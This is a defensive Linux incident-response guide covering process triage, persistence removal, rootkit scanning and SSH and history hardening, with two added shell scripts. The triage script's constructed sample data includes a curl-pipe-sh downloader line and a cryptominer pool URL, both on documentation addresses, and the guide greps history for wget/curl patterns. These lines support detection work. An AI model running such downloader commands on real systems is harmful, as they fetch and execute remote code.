Master Linux Incident Response: Step-by-Step Malware Detection and Removal
This guide outlines a Linux incident-response workflow: identify suspicious behavior, locate and terminate malicious processes, delete the malicious files, close the persistence mechanisms that would reinstall them, and harden the system. Each stage comes with concrete shell commands, monitoring techniques, and remediation tips for dealing with Linux malware.
Overview
Linux incident response lacks built‑in GUI tools; a practical workflow consists of four stages: Identify, Remove, Close Loop (persistence removal), and Harden. The following sections describe typical indicators and concrete shell commands for each stage.
Identify Symptoms
CPU usage
List processes sorted by CPU usage (one batch iteration, top entries only):
top -b -n 1 -o +%CPU | head -n 20
Processes consuming more than 70 % CPU under an unfamiliar name, or running from /tmp, /dev/shm or a hidden directory, are often cryptominers.
Process enumeration
Show all processes with full, untruncated command lines:
ps auxww
Look for unusual arguments such as URLs, which indicate downloader behavior, and for binaries started from world-writable directories.
Security‑gateway alerts
Monitor network connections to known malicious IPs:
while true; do netstat -antp | grep '<malicious_ip>'; sleep 5; done
On systems without netstat, ss -antp prints the same columns. If the alert names a domain whose IP changes, add a temporary /etc/hosts entry that maps the domain to an unused IP address and monitor that IP with the same loop. This only catches malware that resolves names through the system resolver; samples with hard-coded addresses or their own DNS client are unaffected by /etc/hosts.
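As an added example that is not part of the original article, the following script turns the process and connection checks of the Identify stage into reusable functions, and adds a check for running processes whose executable has been deleted from disk (a common self-cleaning trick). It assumes procps ps with -eo pid,pcpu,user,args and iproute2 ss; the ps and ss output embedded below is constructed sample data using documentation addresses, so the script can be tried offline. The CPU threshold, process names and paths are illustrative.

```shell
#!/bin/sh
# Added example for the Identify stage; not code from the original article.
# Every check reads ps- or ss-style lines from stdin so it can be exercised on the
# constructed sample below; triage_live feeds the same checks real host data.
# Assumed input layouts: `ps -eo pid,pcpu,user,args --no-headers` (pid, %CPU, user,
# command line) and `ss -antp` (State Recv-Q Send-Q Local Peer Process).

CPU_THRESHOLD="${CPU_THRESHOLD:-70}"   # percent; the article's cryptominer cut-off

# Constructed sample data; 203.0.113.9 and 192.0.2.10 are documentation addresses.
SAMPLE_PS='  1001  0.3 root     /usr/sbin/sshd -D
  2233 98.7 www-data /tmp/.x/miner -o stratum+tcp://203.0.113.9:3333
  2240  1.2 www-data sh -c curl -fsSL http://203.0.113.9/a.sh | sh
  3001  4.5 mysql    /usr/sbin/mysqld'
SAMPLE_SS='State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
ESTAB 0 0 10.0.0.5:22 192.0.2.10:51522 users:(("sshd",pid=1001,fd=4))
ESTAB 0 0 10.0.0.5:41230 203.0.113.9:3333 users:(("miner",pid=2233,fd=3))
LISTEN 0 128 0.0.0.0:80 0.0.0.0:* users:(("nginx",pid=900,fd=6))'

# Processes above the CPU threshold: prints "HIGH_CPU pid=<pid> cpu=<pct> cmd=<args>".
flag_high_cpu() {
    awk -v t="$CPU_THRESHOLD" '$2 + 0 > t {
        cmd = ""; for (i = 4; i <= NF; i++) cmd = cmd $i " "
        printf "HIGH_CPU pid=%s cpu=%s cmd=%s\n", $1, $2, cmd
    }'
}

# Processes whose command line embeds a URL of any scheme (downloader or miner pool).
flag_url_args() {
    awk '{
        cmd = ""; for (i = 4; i <= NF; i++) cmd = cmd $i " "
        if (cmd ~ /[a-z][a-z0-9+.-]*:\/\//) printf "URL_ARG pid=%s cmd=%s\n", $1, cmd
    }'
}

# Connections whose peer address is the watched IP; the ss header line is skipped.
connections_to() {
    awk -v ip="$1" '$1 != "State" && index($5, ip ":") == 1'
}

# Running processes whose executable was unlinked from disk: /proc/<pid>/exe then
# ends in " (deleted)". The proc root is a parameter so the check can be run
# against a fake tree; on the real /proc, run it as root to see every process.
check_deleted_exe() {
    proc="${1:-/proc}"
    for exe in "$proc"/[0-9]*/exe; do
        [ -L "$exe" ] || continue
        target=$(readlink "$exe" 2>/dev/null) || continue
        case "$target" in
            *" (deleted)")
                pid=${exe#"$proc"/}; pid=${pid%/exe}
                echo "DELETED_EXE pid=$pid path=$target" ;;
        esac
    done
}

# Live triage on the current host; watch_ip repeats the connection check every N seconds.
triage_live() {
    snapshot=$(ps -eo pid,pcpu,user,args --no-headers)
    printf '%s\n' "$snapshot" | flag_high_cpu
    printf '%s\n' "$snapshot" | flag_url_args
    check_deleted_exe
}
watch_ip() { while :; do ss -antp 2>/dev/null | connections_to "$1"; sleep "${2:-5}"; done; }

# Demo on the constructed sample (run with: sh triage.sh); call triage_live on a real host.
printf '%s\n' "$SAMPLE_PS" | flag_high_cpu
printf '%s\n' "$SAMPLE_PS" | flag_url_args
printf '%s\n' "$SAMPLE_SS" | connections_to 203.0.113.9
```

On the sample, the miner is reported twice (high CPU and a pool URL in its arguments), the curl-pipe-sh downloader once, and the single connection to 203.0.113.9 is attributed to pid 2233 by ss. The deleted-executable check is the one to run before killing anything: once the process is gone, /proc/<pid>/exe and the only remaining copy of the binary go with it.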
Command history
Search the shell history for suspicious commands:
history | grep -iE 'wget|curl|bash|sh'
history covers only the current user's interactive shell, and an intruder can clear it; also read each account's ~/.bash_history directly.
Remove Malware
Terminate the malicious process
ps -elf | grep '<pid_or_name>'          # note the PPID too: a parent may respawn the child
ls -al /proc/<pid>/exe                  # verify the binary path while the process still exists
cp /proc/<pid>/exe </evidence/path>     # keep a copy for analysis; works even if the file on disk was already deleted
kill -9 <pid>
If the process reappears after being killed, its parent or a scheduled job is restarting it: kill the parent first, then continue with the persistence checks below.
Delete the executable
rm -f </path/to/binary>
Close Loop (Persistence Removal)
Cron jobs
List user crontabs and system‑wide schedules:
crontab -l
cat /etc/crontab
cat /etc/anacrontab
ls -la /etc/cron.d /etc/cron.*/ /var/spool/cron*
crontab -l shows only the current user's jobs; the cron spool directory holds every user's crontab.
Services
service --status-all | grep -i '<suspicious>'
systemctl list-unit-files --state=enabled
Modified system binaries
Find binaries that were changed in the last week (adjust the time window as needed). An intruder can reset mtime with touch, so the search also matches on ctime, which ordinary tools cannot set; on packaged systems, additionally compare the files against the package database (rpm -Va, or debsums -c on Debian):
find /usr/bin /usr/sbin /bin /usr/local/bin -type f \( -mtime -7 -o -ctime -7 \) -exec ls -la {} \;
Rootkits
Install and run common rootkit scanners:
# chkrootkit
wget -qO- https://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz | tar xzf -
cd chkrootkit-0.52
make sense
./chkrootkit
# rkhunter
wget -qO- https://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.4/rkhunter-1.4.4.tar.gz | tar xzf -
cd rkhunter-1.4.4
./installer.sh --install
rkhunter -c
A kernel-level rootkit can hide from scanners that run on the infected system itself; if the result matters, also scan the disk from clean boot media or a known-good host.
System Hardening
SSH hardening
Identify successful and failed login attempts (the log is /var/log/secure on RHEL-style systems and /var/log/auth.log on Debian/Ubuntu):
grep "Accepted " /var/log/secure* | awk '{print $1,$2,$3,$9,$11}'
grep "Failed password" /var/log/secure* | grep -E -o "([0-9]{1,3}\.){3}[0-9]{1,3}" | sort | uniq -c | sort -rn
uniq -c only merges adjacent duplicates, so without the preceding sort the per-address counts are wrong.
Command auditing
Increase the history size and record a timestamp, source IP and user on every entry. The settings belong in /etc/profile so that every login shell picks them up; exporting them in the current shell alone does not persist:
sed -i 's/^HISTSIZE=.*/HISTSIZE=10000/' /etc/profile
cat >> /etc/profile <<'EOF'
USER_IP=$(who am i 2>/dev/null | sed -n 's/.*(\(.*\)).*/\1/p')
[ -z "$USER_IP" ] && USER_IP=$(hostname)
export HISTTIMEFORMAT="%F %T $USER_IP $(whoami) "
[ -n "$BASH_VERSION" ] && shopt -s histappend
export PROMPT_COMMAND="history -a"
EOF
source /etc/profile
The source address is taken from the parenthesised host field of who am i, so local console sessions fall back to the hostname. Shell history is a convenience, not an audit trail: anyone with a shell can unset HISTFILE or delete the file. For tamper-resistant command logging use auditd.
Web application patches
Apply updates for the components most often exploited for initial access (e.g., Apache Struts 2, ThinkPHP, Confluence, Drupal), and lock down exposed services such as Redis, whose unauthenticated instances are a frequent entry point for cryptominers.
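The SSH hardening and command auditing steps above, as an added example that is not part of the original article: the script summarises sshd events from an auth log with the sort-before-uniq fix applied, flags successful logins from addresses that were also brute-forcing, and writes the history-audit settings as a /etc/profile.d drop-in. The log lines are constructed sample data with documentation addresses; the drop-in path and the HISTFILESIZE value are assumptions.

```shell
#!/bin/sh
# Added example for the hardening stage; not code from the original article.
# It summarises sshd events from an auth log (/var/log/secure on RHEL-style systems,
# /var/log/auth.log on Debian/Ubuntu) and writes the history-audit shell snippet as a
# /etc/profile.d drop-in. The log below is constructed; 198.51.100.7, 203.0.113.9 and
# 192.0.2.10 are documentation addresses.

SAMPLE_AUTH_LOG='Mar  3 10:01:12 web1 sshd[2311]: Failed password for root from 198.51.100.7 port 40112 ssh2
Mar  3 10:01:15 web1 sshd[2311]: Failed password for root from 198.51.100.7 port 40113 ssh2
Mar  3 10:02:01 web1 sshd[2318]: Failed password for invalid user admin from 203.0.113.9 port 50012 ssh2
Mar  3 10:03:44 web1 sshd[2320]: Accepted publickey for deploy from 192.0.2.10 port 51522 ssh2: ED25519 SHA256:k7Qx
Mar  3 10:09:59 web1 sshd[2331]: Failed password for root from 198.51.100.7 port 40180 ssh2
Mar  3 10:10:03 web1 sshd[2333]: Accepted password for root from 203.0.113.9 port 50020 ssh2'

# Failed-password attempts per source IP, busiest first, as "ip count".
# uniq -c only merges adjacent lines, so the addresses are sorted before counting.
failed_logins_by_ip() {
    grep -h 'Failed password' "$@" \
      | grep -Eo 'from ([0-9]{1,3}\.){3}[0-9]{1,3}' | cut -d' ' -f2 \
      | sort | uniq -c | sort -rn | awk '{ print $2, $1 }'
}

# Successful logins as "month day time user ip method". User and address are found
# by keyword rather than by field position, so extra fields cannot shift them.
accepted_logins() {
    grep -h 'Accepted ' "$@" | awk '{
        for (i = 1; i <= NF; i++) { if ($i == "for") user = $(i+1); if ($i == "from") ip = $(i+1) }
        print $1, $2, $3, user, ip, $7
    }'
}

# Successful logins from an address that also produced failed attempts: the signature
# of a brute force that eventually worked, and the first thing to check after a compromise.
suspicious_accepted() {
    log=$(cat "$@")
    failed=$(printf '%s\n' "$log" | failed_logins_by_ip | awk '{ print $1 }')
    printf '%s\n' "$log" | accepted_logins | while read -r mon day time user ip method; do
        printf '%s\n' "$failed" | grep -qxF "$ip" && echo "$mon $day $time $user $ip $method"
    done
    return 0
}

# Command-auditing drop-in: larger history, and a timestamp, source address and user on
# every entry, flushed to the history file after each command rather than at logout.
write_history_audit() {
    target="${1:-/etc/profile.d/history-audit.sh}"
    cat > "$target" <<'EOF'
# history auditing (incident-response hardening)
HISTSIZE=10000
HISTFILESIZE=20000
# source address of this session, or the hostname for local consoles
USER_IP=$(who am i 2>/dev/null | sed -n 's/.*(\(.*\)).*/\1/p')
[ -z "$USER_IP" ] && USER_IP=$(hostname)
export HISTSIZE HISTFILESIZE
export HISTTIMEFORMAT="%F %T $USER_IP $(whoami) "
[ -n "$BASH_VERSION" ] && shopt -s histappend
PROMPT_COMMAND="history -a${PROMPT_COMMAND:+;$PROMPT_COMMAND}"
export PROMPT_COMMAND
EOF
}

# Demo on the constructed log (run with: sh ssh-audit.sh); pass real log paths as
# arguments to the functions on a live host, e.g. suspicious_accepted /var/log/secure*.
printf '%s\n' "$SAMPLE_AUTH_LOG" | failed_logins_by_ip
printf '%s\n' "$SAMPLE_AUTH_LOG" | suspicious_accepted
```

On the sample, 198.51.100.7 accounts for three failures and 203.0.113.9 for one, and the only flagged login is root by password from 203.0.113.9 after that address had already failed once: exactly the event that deserves a closer look. The drop-in keeps the original exports but guards shopt for non-bash login shells and appends to an existing PROMPT_COMMAND instead of overwriting it.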
Conclusion
Linux infections are dominated by botnet worms and cryptominers that exploit exposed services and unpatched web applications. Regular patching, strong authentication, and the above response workflow reduce the risk of compromise.
This article has been distilled and summarized from source material published by ITPUB, then republished for learning and reference.